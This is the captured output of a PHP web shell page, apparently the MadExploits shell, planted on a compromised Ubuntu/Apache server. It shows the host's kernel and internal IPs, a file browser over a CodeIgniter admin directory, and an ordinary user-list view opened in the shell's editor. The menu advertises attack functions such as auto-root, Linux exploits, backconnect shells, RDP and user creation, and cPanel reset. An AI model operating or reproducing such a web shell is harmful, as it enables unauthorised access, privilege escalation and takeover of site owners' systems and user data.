Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
views /
admin /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
ablog-content.php
15.55
KB
-rwxr-x--x
ablog-list.php
4.11
KB
-rwxr-x--x
ablog.php
9.8
KB
-rwxr-x--x
cat-content.php
14.67
KB
-rwxr-x--x
cat-list.php
4.41
KB
-rwxr-x--x
cat.php
11.79
KB
-rwxr-x--x
corse-content.php
24.91
KB
-rwxr-x--x
corse-list.php
5.01
KB
-rwxr-x--x
corse.php
11.97
KB
-rwxr-x--x
dashboard-content.php
7.49
KB
-rwxr-x--x
dashboard.php
4.9
KB
-rwxr-x--x
evnt-content.php
22.8
KB
-rwxr-x--x
evnt-list.php
5.78
KB
-rwxr-x--x
evnt.php
13.14
KB
-rwxr-x--x
item-content.php
29.69
KB
-rwxr-x--x
item-list.php
5.48
KB
-rwxr-x--x
item.php
14.06
KB
-rwxr-x--x
jobc-content.php
24.4
KB
-rwxr-x--x
jobc-list.php
5
KB
-rwxr-x--x
jobc.php
11.97
KB
-rwxr-x--x
mdc-content.php
14.59
KB
-rwxr-x--x
mdc-list.php
5.61
KB
-rwxr-x--x
mdc.php
10.77
KB
-rwxr-x--x
mems-content.php
16.55
KB
-rwxr-x--x
mems-list.php
4.44
KB
-rwxr-x--x
mems.php
10.73
KB
-rwxr-x--x
pages-content.php
11.04
KB
-rwxr-x--x
pages-list.php
2.57
KB
-rwxr-x--x
pages.php
10.41
KB
-rwxr-x--x
proj-content.php
24.42
KB
-rwxr-x--x
proj-list.php
5.85
KB
-rwxr-x--x
proj.php
12.63
KB
-rwxr-x--x
projt-content.php
5.66
KB
-rwxr-x--x
projt-list.php
3.84
KB
-rwxr-x--x
projt.php
8.67
KB
-rwxr-x--x
puba-content.php
5.66
KB
-rwxr-x--x
puba-list.php
3.87
KB
-rwxr-x--x
puba.php
8.67
KB
-rwxr-x--x
publ-content.php
27.35
KB
-rwxr-x--x
publ-list.php
6.23
KB
-rwxr-x--x
publ.php
12.66
KB
-rwxr-x--x
pubv-content.php
5.66
KB
-rwxr-x--x
pubv-list.php
3.87
KB
-rwxr-x--x
pubv.php
8.67
KB
-rwxr-x--x
udig-content.php
5.62
KB
-rwxr-x--x
udig-list.php
3.59
KB
-rwxr-x--x
udig.php
8.67
KB
-rwxr-x--x
user-content.php
32.34
KB
-rwxr-x--x
user-list.php
5.77
KB
-rwxr-x--x
user.php
13.49
KB
-rwxr-x--x
wrks-content.php
24.38
KB
-rwxr-x--x
wrks-list.php
5
KB
-rwxr-x--x
wrks.php
11.84
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user-list.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); ?> <section class="panel"> <div> <table class="table table-bordered table-striped mb-none" id="datatable-default"> <?php $tClmn = 9; if(count($rdList) > 0) { $Clmn1 = ($NEW_TD_ID=='FNAME-ASC') ? 'FNAME-DESC' : 'FNAME-ASC'; $Icon1 = ($SORT_NAME=='FNAME') ? 'fa fa-sort-alpha-'.strtolower($SORT_TYPE) : 'fa fa-sort'; $Clmn2 = ($NEW_TD_ID=='LNAME-ASC') ? 'LNAME-DESC' : 'LNAME-ASC'; $Icon2 = ($SORT_NAME=='LNAME') ? 'fa fa-sort-alpha-'.strtolower($SORT_TYPE) : 'fa fa-sort'; $Clmn3 = ($NEW_TD_ID=='MOBILE-ASC') ? 'MOBILE-DESC' : 'MOBILE-ASC'; $Icon3 = ($SORT_NAME=='MOBILE') ? 'fa fa-sort-numeric-'.strtolower($SORT_TYPE) : 'fa fa-sort'; $Clmn4 = ($NEW_TD_ID=='EMAIL-ASC') ? 'EMAIL-DESC' : 'EMAIL-ASC'; $Icon4 = ($SORT_NAME=='EMAIL') ? 'fa fa-sort-alpha-'.strtolower($SORT_TYPE) : 'fa fa-sort'; $Clmn5 = ($NEW_TD_ID=='TYPID-ASC') ? 'TYPID-DESC' : 'TYPID-ASC'; $Icon5 = ($SORT_NAME=='TYPID') ? 'fa fa-sort-alpha-'.strtolower($SORT_TYPE) : 'fa fa-sort'; $Clmn6 = ($NEW_TD_ID=='GNAME-ASC') ? 'GNAME-DESC' : 'GNAME-ASC'; $Icon6 = ($SORT_NAME=='GNAME') ? 'fa fa-sort-alpha-'.strtolower($SORT_TYPE) : 'fa fa-sort'; $Clmn7 = ($NEW_TD_ID=='STATUS-ASC') ? 'STATUS-DESC' : 'STATUS-ASC'; $Icon7 = ($SORT_NAME=='STATUS') ? 'fa fa-sort-alpha-'.strtolower($SORT_TYPE) : 'fa fa-sort'; ?> <thead> <tr style="background-color:<?=E_CLR;?>;"> <th style="border:2px solid #FFF; border-left:none;"><?=$this->lang->line('GL_SL');?></th> <th style="border:2px solid #FFF;text-align:left;" class="sort-heading" id="<?=$Clmn1;?>"><i class="<?=$Icon1;?>"></i><?=$this->lang->line('_FNAME_');?></th> <th style="border:2px solid #FFF;text-align:left;" class="sort-heading" id="<?=$Clmn2;?>"><i class="<?=$Icon2;?>"></i><?=$this->lang->line('_LNAME_');?></th> <th style="border:2px solid #FFF;text-align:left;" class="sort-heading" id="<?=$Clmn3;?>"><i class="<?=$Icon3;?>"></i><?=$this->lang->line('_MOB_');?></th> <th style="border:2px solid #FFF;text-align:left;" class="sort-heading" id="<?=$Clmn4;?>"><i class="<?=$Icon4;?>"></i><?=$this->lang->line('_EMAIL_');?></th> <th style="border:2px solid #FFF;text-align:left;" class="sort-heading" id="<?=$Clmn5;?>"><i class="<?=$Icon5;?>"></i><?=$this->lang->line('_UTYPE_');?></th> <th style="border:2px solid #FFF;text-align:left;" class="sort-heading" id="<?=$Clmn6;?>"><i class="<?=$Icon6;?>"></i><?=$this->lang->line('_UDESG_');?></th> <th style="border:2px solid #FFF;text-align:right;" class="sort-heading" id="<?=$Clmn7;?>"><i class="<?=$Icon7;?>"></i><?=$this->lang->line('_STS_');?></th> <th style="border:2px solid #FFF; border-right:none;text-align:right;"><?=$this->lang->line('_ACTION_');?></th> </tr> </thead> <tbody> <?php $i=1; foreach($rdList as $key =>$Row) { $SiteUrl = $URL['RDR_URL'].'/'.StrRplace($this->encryption->encrypt($Row['Id'])); $DelUrl = $URL['DEL_URL'].'/'.StrRplace($this->encryption->encrypt($Row['Id'])); $AcsUrl = _USR_ACS.'/'.StrRplace($this->encryption->encrypt($Row['Id'])); $uv_BG =($i%2 == 0)? G_CLR:B_CLR; ?> <tr class="gradeX" style="background-color:<?=$uv_BG;?>;"> <td style="border:2px solid #FFF; border-left:none;"><?=$Row['Sr'];?></td> <td style="border:2px solid #FFF;" align="left"><?=$Row['FNAME'];?></td> <td style="border:2px solid #FFF;" align="left"><?=$Row['LNAME'];?></td> <td style="border:2px solid #FFF; text-align:left;"><?=$Row['MOBILE'];?></td> <td style="border:2px solid #FFF; text-align:left;"><?=$Row['EMAIL'];?></td> <td style="border:2px solid #FFF; text-align:left;"><?=($Row['TYPID']==1)?$this->lang->line('_FCLTY_'):$this->lang->line('_STAF_');?></td> <td style="border:2px solid #FFF; text-align:left;"><?=$Row['GNAME'];?></td> <td style="border:2px solid #FFF; text-align:right;"><?=($Row['STATUS']==STATUS_A)?$this->lang->line('GL_ACTIVE'):$this->lang->line('GL_INACTIVE');?></td> <td style="border:2px solid #FFF; border-right:none;"align="right"> <?php if($Row['STATUS']==STATUS_A){?><a href="<?=site_url($AcsUrl);?>"><button type="button" class="btn bg-success btn-sm" title="Access For User"><i class="fa fa-lock"></i></button></a><?php }?> <a href="<?=site_url($SiteUrl);?>"><button type="button" class="btn bg-primary btn-sm" title="Edit Details"><i class="fa fa-edit"></i></button></a></td> </tr> <?php $i++; } ?> </tbody> <?php }else{ ?> <thead> <tr style="background-color:<?=E_CLR;?>;"> <th colspan="<?=$tClmn;?>" align="center"><span class="headRed"><?=$this->lang->line('NO_RCRDS');?></span></th> </tr> </thead> <?php } ?> </table> </div> <?php if(count($rdList) > 0){?><div class="pagination"><?=$this->ajax_pagination->create_links(); ?></div><?php } ?> </section>
Close